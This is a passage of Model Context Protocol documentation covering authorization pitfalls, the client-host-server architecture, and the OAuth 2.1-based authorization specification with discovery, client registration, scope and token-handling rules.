You will be able to invoke individual tools with the help of the `#` sign in the chat view.
## Common Pitfalls and How to Avoid Them
For comprehensive security guidance, including attack vectors, mitigation strategies, and implementation best practices, make sure to read through [Security Best Practices](/specification/draft/basic/security_best_practices). A few key issues are called out below.
* **Do not implement token validation or authorization logic by yourself**. Use off-the-shelf, well-tested, and secure libraries for things like token validation or authorization decisions. Doing everything from scratch means that you're more likely to implement things incorrectly unless you are a security expert.
* **Use short-lived access tokens**. Depending on the authorization server used, this setting might be customizable. We recommend to not use long-lived tokens - if a malicious actor steals them, they will be able to maintain their access for longer periods.
* **Always validate tokens**. Just because your server received a token does not mean that the token is valid or that it's meant for your server. Always verify that what your MCP server is getting from the client matches the required constraints.
* **Store tokens in secure, encrypted storage**. In certain scenarios, you might need to cache tokens server-side. If that is the case, ensure that the storage has the right access controls and cannot be easily exfiltrated by malicious parties with access to your server. You should also implement robust cache eviction policies to ensure that your MCP server is not re-using expired or otherwise invalid tokens.
* **Enforce HTTPS in production**. Do not accept tokens or redirect callbacks over plain HTTP except for `localhost` during development.
* **Least-privilege scopes**. Don't use catch‑all scopes. Split access per tool or capability where possible and verify required scopes per route/tool on the resource server.
* **Don't log credentials**. Never log `Authorization` headers, tokens, codes, or secrets. Scrub query strings and headers. Redact sensitive fields in structured logs.
* **Separate app vs. resource server credentials**. Don't reuse your MCP server's client secret for end‑user flows. Store all secrets in a proper secret manager, not in source control.
* **Return proper challenges**. On 401, include `WWW-Authenticate` with `Bearer`, `realm`, and `resource_metadata` so clients can discover how to authenticate.
* **DCR (Dynamic Client Registration) controls**. If enabled, be aware of constraints specific to your organization, such as trusted hosts, required vetting, and audited registrations. Unauthenticated DCR means that anyone can register any client with your authorization server.
* **Multi‑tenant/realm mix-ups**. Pin to a single issuer/tenant unless explicitly multi‑tenant. Reject tokens from other realms even if signed by the same authorization server.
* **Audience/resource indicator misuse**. Don't configure or accept generic audiences (like `api`) or unrelated resources. Require the audience/resource to match your configured server.
* **Error detail leakage**. Return generic messages to clients, but log detailed reasons with correlation IDs internally to aid troubleshooting without exposing internals.
* **Session identifier hardening**. Treat `Mcp-Session-Id` as untrusted input; never tie authorization to it. Regenerate on auth changes and validate lifecycle server‑side.
## Related Standards and Documentation
MCP authorization builds on these well-established standards:
* **[OAuth 2.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13)**: The core authorization framework
* **[RFC 8414](https://datatracker.ietf.org/doc/html/rfc8414)**: Authorization Server Metadata discovery
* **[RFC 7591](https://datatracker.ietf.org/doc/html/rfc7591)**: Dynamic Client Registration
* **[RFC 9728](https://datatracker.ietf.org/doc/html/rfc9728)**: Protected Resource Metadata
* **[RFC 8707](https://datatracker.ietf.org/doc/html/rfc8707)**: Resource Indicators
For additional details, refer to:
* [Authorization Specification](/specification/draft/basic/authorization)
* [Security Best Practices](/specification/draft/basic/security_best_practices)
* [Available MCP SDKs](/docs/sdk)
Understanding these standards will help you implement authorization correctly and troubleshoot issues when they arise.
# Architecture
Source: https://modelcontextprotocol.io/specification/2025-11-25/architecture/index
The Model Context Protocol (MCP) follows a client-host-server architecture where each
host can run multiple client instances. This architecture enables users to integrate AI
capabilities across applications while maintaining clear security boundaries and
isolating concerns. Built on JSON-RPC, MCP provides a stateful session protocol focused
on context exchange and sampling coordination between clients and servers.
## Core Components
```mermaid theme={null}
graph LR
subgraph "Application Host Process"
H[Host]
C1[Client 1]
C2[Client 2]
C3[Client 3]
H --> C1
H --> C2
H --> C3
end
subgraph "Local machine"
S1[Server 1 Files & Git]
S2[Server 2 Database]
R1[("Local Resource A")]
R2[("Local Resource B")]
C1 --> S1
C2 --> S2
S1 <--> R1
S2 <--> R2
end
subgraph "Internet"
S3[Server 3 External APIs]
R3[("Remote Resource C")]
C3 --> S3
S3 <--> R3
end
```
### Host
The host process acts as the container and coordinator:
* Creates and manages multiple client instances
* Controls client connection permissions and lifecycle
* Enforces security policies and consent requirements
* Handles user authorization decisions
* Coordinates AI/LLM integration and sampling
* Manages context aggregation across clients
### Clients
Each client is created by the host and maintains an isolated server connection:
* Establishes one stateful session per server
* Handles protocol negotiation and capability exchange
* Routes protocol messages bidirectionally
* Manages subscriptions and notifications
* Maintains security boundaries between servers
A host application creates and manages multiple clients, with each client having a 1:1
relationship with a particular server.
### Servers
Servers provide specialized context and capabilities:
* Expose resources, tools and prompts via MCP primitives
* Operate independently with focused responsibilities
* Request sampling through client interfaces
* Must respect security constraints
* Can be local processes or remote services
## Design Principles
MCP is built on several key design principles that inform its architecture and
implementation:
1. **Servers should be extremely easy to build**
* Host applications handle complex orchestration responsibilities
* Servers focus on specific, well-defined capabilities
* Simple interfaces minimize implementation overhead
* Clear separation enables maintainable code
2. **Servers should be highly composable**
* Each server provides focused functionality in isolation
* Multiple servers can be combined seamlessly
* Shared protocol enables interoperability
* Modular design supports extensibility
3. **Servers should not be able to read the whole conversation, nor "see into" other
servers**
* Servers receive only necessary contextual information
* Full conversation history stays with the host
* Each server connection maintains isolation
* Cross-server interactions are controlled by the host
* Host process enforces security boundaries
4. **Features can be added to servers and clients progressively**
* Core protocol provides minimal required functionality
* Additional capabilities can be negotiated as needed
* Servers and clients evolve independently
* Protocol designed for future extensibility
* Backwards compatibility is maintained
## Capability Negotiation
The Model Context Protocol uses a capability-based negotiation system where clients and
servers explicitly declare their supported features during initialization. Capabilities
determine which protocol features and primitives are available during a session.
* Servers declare capabilities like resource subscriptions, tool support, and prompt
templates
* Clients declare capabilities like sampling support and notification handling
* Both parties must respect declared capabilities throughout the session
* Additional capabilities can be negotiated through extensions to the protocol
```mermaid theme={null}
sequenceDiagram
participant Host
participant Client
participant Server
Host->>+Client: Initialize client
Client->>+Server: Initialize session with capabilities
Server-->>Client: Respond with supported capabilities
Note over Host,Server: Active Session with Negotiated Features
loop Client Requests
Host->>Client: User- or model-initiated action
Client->>Server: Request (tools/resources)
Server-->>Client: Response
Client-->>Host: Update UI or respond to model
end
loop Server Requests
Server->>Client: Request (sampling)
Client->>Host: Forward to AI
Host-->>Client: AI response
Client-->>Server: Response
end
loop Notifications
Server--)Client: Resource updates
Client--)Server: Status changes
end
Host->>Client: Terminate
Client->>-Server: End session
deactivate Server
```
Each capability unlocks specific protocol features for use during the session. For
example:
* Implemented [server features](/specification/2025-11-25/server) must be advertised in the
server's capabilities
* Emitting resource subscription notifications requires the server to declare
subscription support
* Tool invocation requires the server to declare tool capabilities
* [Sampling](/specification/2025-11-25/client) requires the client to declare support in its
capabilities
This capability negotiation ensures clients and servers have a clear understanding of
supported functionality while maintaining protocol extensibility.
# Authorization
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/authorization
**Protocol Revision**: 2025-11-25
## Introduction
### Purpose and Scope
The Model Context Protocol provides authorization capabilities at the transport level,
enabling MCP clients to make requests to restricted MCP servers on behalf of resource
owners. This specification defines the authorization flow for HTTP-based transports.
### Protocol Requirements
Authorization is **OPTIONAL** for MCP implementations. When supported:
* Implementations using an HTTP-based transport **SHOULD** conform to this specification.
* Implementations using an STDIO transport **SHOULD NOT** follow this specification, and
instead retrieve credentials from the environment.
* Implementations using alternative transports **MUST** follow established security best
practices for their protocol.
### Standards Compliance
This authorization mechanism is based on established specifications listed below, but
implements a selected subset of their features to ensure security and interoperability
while maintaining simplicity:
* OAuth 2.1 IETF DRAFT ([draft-ietf-oauth-v2-1-13](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13))
* OAuth 2.0 Authorization Server Metadata
([RFC8414](https://datatracker.ietf.org/doc/html/rfc8414))
* OAuth 2.0 Dynamic Client Registration Protocol
([RFC7591](https://datatracker.ietf.org/doc/html/rfc7591))
* OAuth 2.0 Protected Resource Metadata ([RFC9728](https://datatracker.ietf.org/doc/html/rfc9728))
* OAuth Client ID Metadata Documents ([draft-ietf-oauth-client-id-metadata-document-00](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00))
## Roles
A protected *MCP server* acts as an [OAuth 2.1 resource server](https://www.ietf.org/archive/id/draft-ietf-oauth-v2-1-13.html#name-roles),
capable of accepting and responding to protected resource requests using access tokens.
An *MCP client* acts as an [OAuth 2.1 client](https://www.ietf.org/archive/id/draft-ietf-oauth-v2-1-13.html#name-roles),
making protected resource requests on behalf of a resource owner.
The *authorization server* is responsible for interacting with the user (if necessary) and issuing access tokens for use at the MCP server.
The implementation details of the authorization server are beyond the scope of this specification. It may be hosted with the
resource server or a separate entity. The [Authorization Server Discovery section](#authorization-server-discovery)
specifies how an MCP server indicates the location of its corresponding authorization server to a client.
## Overview
1. Authorization servers **MUST** implement OAuth 2.1 with appropriate security
measures for both confidential and public clients.
2. Authorization servers and MCP clients **SHOULD** support OAuth Client ID Metadata Documents
([draft-ietf-oauth-client-id-metadata-document-00](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00)).
3. Authorization servers and MCP clients **MAY** support the OAuth 2.0 Dynamic Client Registration
Protocol ([RFC7591](https://datatracker.ietf.org/doc/html/rfc7591)).
4. MCP servers **MUST** implement OAuth 2.0 Protected Resource Metadata ([RFC9728](https://datatracker.ietf.org/doc/html/rfc9728)).
MCP clients **MUST** use OAuth 2.0 Protected Resource Metadata for authorization server discovery.
5. MCP authorization servers **MUST** provide at least one of the following discovery mechanisms:
* OAuth 2.0 Authorization Server Metadata ([RFC8414](https://datatracker.ietf.org/doc/html/rfc8414))
* [OpenID Connect Discovery 1.0](https://openid.net/specs/openid-connect-discovery-1_0.html)
MCP clients **MUST** support both discovery mechanisms to obtain the information required to interact with the authorization server.
## Authorization Server Discovery
This section describes the mechanisms by which MCP servers advertise their associated
authorization servers to MCP clients, as well as the discovery process through which MCP
clients can determine authorization server endpoints and supported capabilities.
### Authorization Server Location
MCP servers **MUST** implement the OAuth 2.0 Protected Resource Metadata ([RFC9728](https://datatracker.ietf.org/doc/html/rfc9728))
specification to indicate the locations of authorization servers. The Protected Resource Metadata document returned by the MCP server **MUST** include
the `authorization_servers` field containing at least one authorization server.
The specific use of `authorization_servers` is beyond the scope of this specification; implementers should consult
OAuth 2.0 Protected Resource Metadata ([RFC9728](https://datatracker.ietf.org/doc/html/rfc9728)) for
guidance on implementation details.
Implementors should note that Protected Resource Metadata documents can define multiple authorization servers. The responsibility for selecting which authorization server to use lies with the MCP client, following the guidelines specified in
[RFC9728 Section 7.6 "Authorization Servers"](https://datatracker.ietf.org/doc/html/rfc9728#name-authorization-servers).
### Protected Resource Metadata Discovery Requirements
MCP servers **MUST** implement one of the following discovery mechanisms to provide authorization server location information to MCP clients:
1. **WWW-Authenticate Header**: Include the resource metadata URL in the `WWW-Authenticate` HTTP header under `resource_metadata` when returning `401 Unauthorized` responses, as described in [RFC9728 Section 5.1](https://datatracker.ietf.org/doc/html/rfc9728#name-www-authenticate-response).
2. **Well-Known URI**: Serve metadata at a well-known URI as specified in [RFC9728](https://datatracker.ietf.org/doc/html/rfc9728). This can be either:
* At the path of the server's MCP endpoint: `https://example.com/public/mcp` could host metadata at `https://example.com/.well-known/oauth-protected-resource/public/mcp`
* At the root: `https://example.com/.well-known/oauth-protected-resource`
MCP clients **MUST** support both discovery mechanisms and use the resource metadata URL from the parsed `WWW-Authenticate` headers when present; otherwise, they **MUST** fall back to constructing and requesting the well-known URIs in the order listed above.
MCP servers **SHOULD** include a `scope` parameter in the `WWW-Authenticate` header as defined in
[RFC 6750 Section 3](https://datatracker.ietf.org/doc/html/rfc6750#section-3)
to indicate the scopes required for accessing the resource. This provides clients with immediate
guidance on the appropriate scopes to request during authorization,
following the principle of least privilege and preventing clients from requesting excessive permissions.
The scopes included in the `WWW-Authenticate` challenge **MAY** match `scopes_supported`, be a subset
or superset of it, or an alternative collection that is neither a strict subset nor
superset. Clients **MUST NOT** assume any particular set relationship between the challenged
scope set and `scopes_supported`. Clients **MUST** treat the scopes provided in the
challenge as authoritative for satisfying the current request. Servers **SHOULD** strive for
consistency in how they construct scope sets but they are not required to surface every dynamically
issued scope through `scopes_supported`.
Example 401 response with scope guidance:
```http theme={null}
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource",
scope="files:read"
```
MCP clients **MUST** be able to parse `WWW-Authenticate` headers and respond appropriately to `HTTP 401 Unauthorized` responses from the MCP server.
If the `scope` parameter is absent, clients **SHOULD** apply the fallback behavior defined in the [Scope Selection Strategy](#scope-selection-strategy) section.
### Authorization Server Metadata Discovery
To handle different issuer URL formats and ensure interoperability with both OAuth 2.0 Authorization Server Metadata and OpenID Connect Discovery 1.0 specifications, MCP clients **MUST** attempt multiple well-known endpoints when discovering authorization server metadata.
The discovery approach is based on [RFC8414 Section 3.1 "Authorization Server Metadata Request"](https://datatracker.ietf.org/doc/html/rfc8414#section-3.1) for OAuth 2.0 Authorization Server Metadata discovery and [RFC8414 Section 5 "Compatibility Notes"](https://datatracker.ietf.org/doc/html/rfc8414#section-5) for OpenID Connect Discovery 1.0 interoperability.
For issuer URLs with path components (e.g., `https://auth.example.com/tenant1`), clients **MUST** try endpoints in the following priority order:
1. OAuth 2.0 Authorization Server Metadata with path insertion: `https://auth.example.com/.well-known/oauth-authorization-server/tenant1`
2. OpenID Connect Discovery 1.0 with path insertion: `https://auth.example.com/.well-known/openid-configuration/tenant1`
3. OpenID Connect Discovery 1.0 path appending: `https://auth.example.com/tenant1/.well-known/openid-configuration`
For issuer URLs without path components (e.g., `https://auth.example.com`), clients **MUST** try:
1. OAuth 2.0 Authorization Server Metadata: `https://auth.example.com/.well-known/oauth-authorization-server`
2. OpenID Connect Discovery 1.0: `https://auth.example.com/.well-known/openid-configuration`
### Authorization Server Discovery Sequence Diagram
The following diagram outlines an example flow:
```mermaid theme={null}
sequenceDiagram
participant C as Client
participant M as MCP Server (Resource Server)
participant A as Authorization Server
Note over C: Attempt unauthenticated MCP request
C->>M: MCP request without token
M-->>C: HTTP 401 Unauthorized (may include WWW-Authenticate header)
alt Header includes resource_metadata
Note over C: Extract resource_metadata URL from header
C->>M: GET resource_metadata URI
M-->>C: Resource metadata with authorization server URL
else No resource_metadata in header
Note over C: Fallback to well-known URI probing
Note over M: _Not applicable if the MCP server is at the root_
C->>M: GET /.well-known/oauth-protected-resource/mcp
alt Sub-path metadata found
M-->>C: Resource metadata with authorization server URL
else Sub-path not found
C->>M: GET /.well-known/oauth-protected-resource
alt Root metadata found
M-->>C: Resource metadata with authorization server URL
else Root metadata not found
Note over C: Abort or use pre-configured values
end
end
end
Note over C: Validate RS metadata, build AS metadata URL
C->>A: GET Authorization server metadata endpoint
Note over C,A: Try OAuth 2.0 and OpenID Connect discovery endpoints in priority order
A-->>C: Authorization server metadata
Note over C,A: OAuth 2.1 authorization flow happens here
C->>A: Token request
A-->>C: Access token
C->>M: MCP request with access token
M-->>C: MCP response
Note over C,M: MCP communication continues with valid token
```
## Client Registration Approaches
MCP supports three client registration mechanisms. Choose based on your scenario:
* **Client ID Metadata Documents**: When client and server have no prior relationship (most common)
* **Pre-registration**: When client and server have an existing relationship
* **Dynamic Client Registration**: For backwards compatibility or specific requirements
Clients supporting all options **SHOULD** follow the following priority order:
1. Use pre-registered client information for the server if the client has it available
2. Use Client ID Metadata Documents if the Authorization Server indicates if the server supports it (via `client_id_metadata_document_supported` in OAuth Authorization Server Metadata)
3. Use Dynamic Client Registration as a fallback if the Authorization Server supports it (via `registration_endpoint` in OAuth Authorization Server Metadata)
4. Prompt the user to enter the client information if no other option is available
### Client ID Metadata Documents
MCP clients and authorization servers **SHOULD** support OAuth Client ID Metadata Documents as specified in
[OAuth Client ID Metadata Document](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00).
This approach enables clients to use HTTPS URLs as client identifiers, where the URL points to a JSON document
containing client metadata. This addresses the common MCP scenario where servers and clients have
no pre-existing relationship.
#### Implementation Requirements
MCP implementations supporting Client ID Metadata Documents **MUST** follow the requirements specified in
[OAuth Client ID Metadata Document](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00).
Key requirements include:
**For MCP Clients:**
* Clients **MUST** host their metadata document at an HTTPS URL following RFC requirements
* The `client_id` URL **MUST** use the "https" scheme and contain a path component, e.g. `https://example.com/client.json`
* The metadata document **MUST** include at least the following properties: `client_id`, `client_name`, `redirect_uris`
* Clients **MUST** ensure the `client_id` value in the metadata matches the document URL exactly
* Clients **MAY** use `private_key_jwt` for client authentication (e.g., for requests to the token endpoint) with appropriate JWKS configuration as described in [Section 6.2 of Client ID Metadata Document](https://www.ietf.org/archive/id/draft-ietf-oauth-client-id-metadata-document-00.html#section-6.2)
**For Authorization Servers:**
* **SHOULD** fetch metadata documents when encountering URL-formatted client\_ids
* **MUST** validate that the fetched document's `client_id` matches the URL exactly
* **SHOULD** cache metadata respecting HTTP cache headers
* **MUST** validate redirect URIs presented in an authorization request against those in the metadata document
* **MUST** validate the document structure is valid JSON and contains required fields
* **SHOULD** follow the security considerations in [Section 6 of Client ID Metadata Document](https://www.ietf.org/archive/id/draft-ietf-oauth-client-id-metadata-document-00.html#section-6)
#### Example Metadata Document
```json theme={null}
{
"client_id": "https://app.example.com/oauth/client-metadata.json",
"client_name": "Example MCP Client",
"client_uri": "https://app.example.com",
"logo_uri": "https://app.example.com/logo.png",
"redirect_uris": [
"http://127.0.0.1:3000/callback",
"http://localhost:3000/callback"
],
"grant_types": ["authorization_code"],
"response_types": ["code"],
"token_endpoint_auth_method": "none"
}
```
#### Client ID Metadata Documents Flow
The following diagram illustrates the complete flow when using Client ID Metadata Documents:
```mermaid theme={null}
sequenceDiagram
participant User
participant Client as MCP Client
participant Server as Authorization Server
participant Metadata as Metadata Endpoint (Client's HTTPS URL)
participant Resource as MCP Server
Note over Client,Metadata: Client hosts metadata at https://app.example.com/oauth/metadata.json
User->>Client: Initiates connection to MCP Server
Client->>Server: Authorization Request client_id=https://app.example.com/oauth/metadata.json redirect_uri=http://localhost:3000/callback
Server->>User: Authentication prompt
User->>Server: Provides credentials
Note over Server: Authenticates user
Note over Server: Detects URL-formatted client_id
Server->>Metadata: GET https://app.example.com/oauth/metadata.json
Metadata-->>Server: JSON Metadata Document {client_id, client_name, redirect_uris, ...}
Note over Server: Validates: 1. client_id matches URL 2. redirect_uri in allowed list 3. Document structure valid 4. (Optional) Domain allowed via trust policy
alt Validation Success
Server->>User: Display consent page with client_name
User->>Server: Approves access
Server->>Client: Authorization code via redirect_uri
Client->>Server: Exchange code for token client_id=https://app.example.com/oauth/metadata.json
Server-->>Client: Access token
Client->>Resource: MCP requests with access token
Resource-->>Client: MCP responses
else Validation Failure
Server->>User: Error response error=invalid_client or invalid_request
end
Note over Server: Cache metadata for future requests (respecting HTTP cache headers)
```
#### Discovery
Authorization servers advertise that they support clients using Client ID Metadata Documents by including the following property in their OAuth Authorization Server metadata:
```json theme={null}
{
"client_id_metadata_document_supported": true
}
```
MCP clients **SHOULD** check for this capability and **MAY** fall back to Dynamic Client Registration
or pre-registration if unavailable.
### Preregistration
MCP clients **SHOULD** support an option for static client credentials such as those supplied by a preregistration flow. This could be:
1. Hardcode a client ID (and, if applicable, client credentials) specifically for the MCP client to use when
interacting with that authorization server, or
2. Present a UI to users that allows them to enter these details, after registering an
OAuth client themselves (e.g., through a configuration interface hosted by the
server).
### Dynamic Client Registration
MCP clients and authorization servers **MAY** support the
OAuth 2.0 Dynamic Client Registration Protocol [RFC7591](https://datatracker.ietf.org/doc/html/rfc7591)
to allow MCP clients to obtain OAuth client IDs without user interaction.
This option is included for backwards compatibility with earlier versions of the MCP authorization spec.
## Scope Selection Strategy
When implementing authorization flows, MCP clients **SHOULD** follow the principle of least privilege by requesting
only the scopes necessary for their intended operations. During the initial authorization handshake, MCP clients
**SHOULD** follow this priority order for scope selection:
1. **Use `scope` parameter** from the initial `WWW-Authenticate` header in the 401 response, if provided
2. **If `scope` is not available**, use all scopes defined in `scopes_supported` from the Protected Resource Metadata document, omitting the `scope` parameter if `scopes_supported` is undefined.
This approach accommodates the general-purpose nature of MCP clients, which typically lack domain-specific knowledge to make informed decisions about individual scope selection. Requesting all available scopes allows the authorization server and end-user to determine appropriate permissions during the consent process.
This approach minimizes user friction while following the principle of least privilege.
The `scopes_supported` field is intended to represent the minimal set of scopes necessary
for basic functionality (see [Scope Minimization](/specification/2025-11-25/basic/security_best_practices#scope-minimization)),
with additional scopes requested incrementally through the step-up authorization flow steps
described in the [Scope Challenge Handling](#scope-challenge-handling) section.
## Authorization Flow Steps
The complete Authorization flow proceeds as follows:
```mermaid theme={null}
sequenceDiagram
participant B as User-Agent (Browser)
participant C as Client
participant M as MCP Server (Resource Server)
participant A as Authorization Server
C->>M: MCP request without token
M->>C: HTTP 401 Unauthorized with WWW-Authenticate header
Note over C: Extract resource_metadata URL from WWW-Authenticate
C->>M: Request Protected Resource Metadata
M->>C: Return metadata
Note over C: Parse metadata and extract authorization server(s) Client determines AS to use
C->>A: GET Authorization server metadata endpoint
Note over C,A: Try OAuth 2.0 and OpenID Connect discovery endpoints in priority order
A-->>C: Authorization server metadata
alt Client ID Metadata Documents
Note over C: Client uses HTTPS URL as client_id
Note over A: Server detects URL-formatted client_id
A->>C: Fetch metadata from client_id URL
C-->>A: JSON metadata document
Note over A: Validate metadata and redirect_uris
else Dynamic client registration
C->>A: POST /register
A->>C: Client Credentials
else Pre-registered client
Note over C: Use existing client_id
end
Note over C: Generate PKCE parameters Include resource parameter Apply scope selection strategy
C->>B: Open browser with authorization URL + code_challenge + resource
B->>A: Authorization request with resource parameter
Note over A: User authorizes
A->>B: Redirect to callback with authorization code
B->>C: Authorization code callback
C->>A: Token request + code_verifier + resource
A->>C: Access token (+ refresh token)
C->>M: MCP request with access token
M-->>C: MCP response
Note over C,M: MCP communication continues with valid token
```
## Resource Parameter Implementation
MCP clients **MUST** implement Resource Indicators for OAuth 2.0 as defined in [RFC 8707](https://www.rfc-editor.org/rfc/rfc8707.html)
to explicitly specify the target resource for which the token is being requested. The `resource` parameter:
1. **MUST** be included in both authorization requests and token requests.
2. **MUST** identify the MCP server that the client intends to use the token with.
3. **MUST** use the canonical URI of the MCP server as defined in [RFC 8707 Section 2](https://www.rfc-editor.org/rfc/rfc8707.html#name-access-token-request).
### Canonical Server URI
For the purposes of this specification, the canonical URI of an MCP server is defined as the resource identifier as specified in
[RFC 8707 Section 2](https://www.rfc-editor.org/rfc/rfc8707.html#section-2) and aligns with the `resource` parameter in
[RFC 9728](https://datatracker.ietf.org/doc/html/rfc9728).
MCP clients **SHOULD** provide the most specific URI that they can for the MCP server they intend to access, following the guidance in [RFC 8707](https://www.rfc-editor.org/rfc/rfc8707). While the canonical form uses lowercase scheme and host components, implementations **SHOULD** accept uppercase scheme and host components for robustness and interoperability.
Examples of valid canonical URIs:
* `https://mcp.example.com/mcp`
* `https://mcp.example.com`
* `https://mcp.example.com:8443`
* `https://mcp.example.com/server/mcp` (when path component is necessary to identify individual MCP server)
Examples of invalid canonical URIs:
* `mcp.example.com` (missing scheme)
* `https://mcp.example.com#fragment` (contains fragment)
> **Note:** While both `https://mcp.example.com/` (with trailing slash) and `https://mcp.example.com` (without trailing slash) are technically valid absolute URIs according to [RFC 3986](https://www.rfc-editor.org/rfc/rfc3986), implementations **SHOULD** consistently use the form without the trailing slash for better interoperability unless the trailing slash is semantically significant for the specific resource.
For example, if accessing an MCP server at `https://mcp.example.com`, the authorization request would include:
```
&resource=https%3A%2F%2Fmcp.example.com
```
MCP clients **MUST** send this parameter regardless of whether authorization servers support it.
## Access Token Usage
### Token Requirements
Access token handling when making requests to MCP servers **MUST** conform to the requirements defined in
[OAuth 2.1 Section 5 "Resource Requests"](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5).
Specifically:
1. MCP client **MUST** use the Authorization request header field defined in
[OAuth 2.1 Section 5.1.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5.1.1):
```
Authorization: Bearer
```
Note that authorization **MUST** be included in every HTTP request from client to server,
even if they are part of the same logical session.
2. Access tokens **MUST NOT** be included in the URI query string
Example request:
```http theme={null}
GET /mcp HTTP/1.1
Host: mcp.example.com
Authorization: Bearer eyJhbGciOiJIUzI1NiIs...
```
### Token Handling
MCP servers, acting in their role as an OAuth 2.1 resource server, **MUST** validate access tokens as described in
[OAuth 2.1 Section 5.2](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5.2).
MCP servers **MUST** validate that access tokens were issued specifically for them as the intended audience,
according to [RFC 8707 Section 2](https://www.rfc-editor.org/rfc/rfc8707.html#section-2).
If validation fails, servers **MUST** respond according to
[OAuth 2.1 Section 5.3](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5.3)
error handling requirements. Invalid or expired tokens **MUST** receive a HTTP 401
response.
MCP clients **MUST NOT** send tokens to the MCP server other than ones issued by the MCP server's authorization server.
MCP servers **MUST** only accept tokens that are valid for use with their
own resources.
MCP servers **MUST NOT** accept or transit any other tokens.
## Error Handling
Servers **MUST** return appropriate HTTP status codes for authorization errors:
| Status Code | Description | Usage |
| ----------- | ------------ | ------------------------------------------ |
| 401 | Unauthorized | Authorization required or token invalid |
| 403 | Forbidden | Invalid scopes or insufficient permissions |
| 400 | Bad Request | Malformed authorization request |
### Scope Challenge Handling
This section covers handling insufficient scope errors during runtime operations when
a client already has a token but needs additional permissions. This follows the error
handling patterns defined in [OAuth 2.1 Section 5](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5)
and leverages the metadata fields from [RFC 9728 (OAuth 2.0 Protected Resource Metadata)](https://datatracker.ietf.org/doc/html/rfc9728).
#### Runtime Insufficient Scope Errors
When a client makes a request with an access token with insufficient
scope during runtime operations, the server **SHOULD** respond with:
* `HTTP 403 Forbidden` status code (per [RFC 6750 Section 3.1](https://datatracker.ietf.org/doc/html/rfc6750#section-3.1))
* `WWW-Authenticate` header with the `Bearer` scheme and additional parameters:
* `error="insufficient_scope"` - indicating the specific type of authorization failure
* `scope="required_scope1 required_scope2"` - specifying the minimum scopes needed for the operation
* `resource_metadata` - the URI of the Protected Resource Metadata document (for consistency with 401 responses)
* `error_description` (optional) - human-readable description of the error
**Server Scope Management**: When responding with insufficient scope errors, servers
**SHOULD** include the scopes needed to satisfy the current request in the `scope`
parameter.
Servers have flexibility in determining which scopes to include:
* **Minimum approach**: Include the newly-required scopes for the specific operation. Include any existing granted scopes as well, if they are required, to prevent clients from losing previously granted permissions.
* **Recommended approach**: Include both existing relevant scopes and newly required scopes to prevent clients from losing previously granted permissions
* **Extended approach**: Include existing scopes, newly required scopes, and related scopes that commonly work together
The choice depends on the server's assessment of user experience impact and authorization friction.
Servers **SHOULD** be consistent in their scope inclusion strategy to provide predictable behavior for clients.
Servers **SHOULD** consider the user experience impact when determining which scopes to include in the
response, as misconfigured scopes may require frequent user interaction.
Example insufficient scope response:
```http theme={null}
HTTP/1.1 403 Forbidden
WWW-Authenticate: Bearer error="insufficient_scope",
scope="files:read files:write user:profile",
resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource",
error_description="Additional file write permission required"
```
#### Step-Up Authorization Flow
Clients will receive scope-related errors during initial authorization or at runtime (`insufficient_scope`).
Clients **SHOULD** respond to these errors by requesting a new access token with an increased set of scopes via a step-up authorization flow or handle the errors in other, appropriate ways.
Clients acting on behalf of a user **SHOULD** attempt the step-up authorization flow. Clients acting on their own behalf (`client_credentials` clients)
**MAY** attempt the step-up authorization flow or abort the request immediately.
The flow is as follows:
1. **Parse error information** from the authorization server response or `WWW-Authenticate` header
2. **Determine required scopes** as outlined in [Scope Selection Strategy](#scope-selection-strategy).
3. **Initiate (re-)authorization** with the determined scope set
4. **Retry the original request** with the new authorization no more than a few times and treat this as a permanent authorization failure
Clients **SHOULD** implement retry limits and **SHOULD** track scope upgrade attempts to avoid
repeated failures for the same resource and operation combination.
## Security Considerations
Implementations **MUST** follow OAuth 2.1 security best practices as laid out in [OAuth 2.1 Section 7. "Security Considerations"](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#name-security-considerations).
### Token Audience Binding and Validation
[RFC 8707](https://www.rfc-editor.org/rfc/rfc8707.html) Resource Indicators provide critical security benefits by binding tokens to their intended
audiences **when the Authorization Server supports the capability**. To enable current and future adoption:
* MCP clients **MUST** include the `resource` parameter in authorization and token requests as specified in the [Resource Parameter Implementation](#resource-parameter-implementation) section
* MCP servers **MUST** validate that tokens presented to them were specifically issued for their use
The [Security Best Practices document](/specification/2025-11-25/basic/security_best_practices#token-passthrough)
outlines why token audience validation is crucial and why token passthrough is explicitly forbidden.
### Token Theft
Attackers who obtain tokens stored by the client, or tokens cached or logged on the server can access protected resources with
requests that appear legitimate to resource servers.
Clients and servers **MUST** implement secure token storage and follow OAuth best practices,
as outlined in [OAuth 2.1, Section 7.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-7.1).
Authorization servers **SHOULD** issue short-lived access tokens to reduce the impact of leaked tokens.
For public clients, authorization servers **MUST** rotate refresh tokens as described in [OAuth 2.1 Section 4.3.1 "Token Endpoint Extension"](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-4.3.1).
### Communication Security
Implementations **MUST** follow [OAuth 2.1 Section 1.5 "Communication Security"](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-1.5).
Specifically:
1. All authorization server endpoints **MUST** be served over HTTPS.
2. All redirect URIs **MUST** be either `localhost` or use HTTPS.
### Authorization Code Protection
An attacker who has gained access to an authorization code contained in an authorization response can try to redeem the authorization code for an access token or otherwise make use of the authorization code.
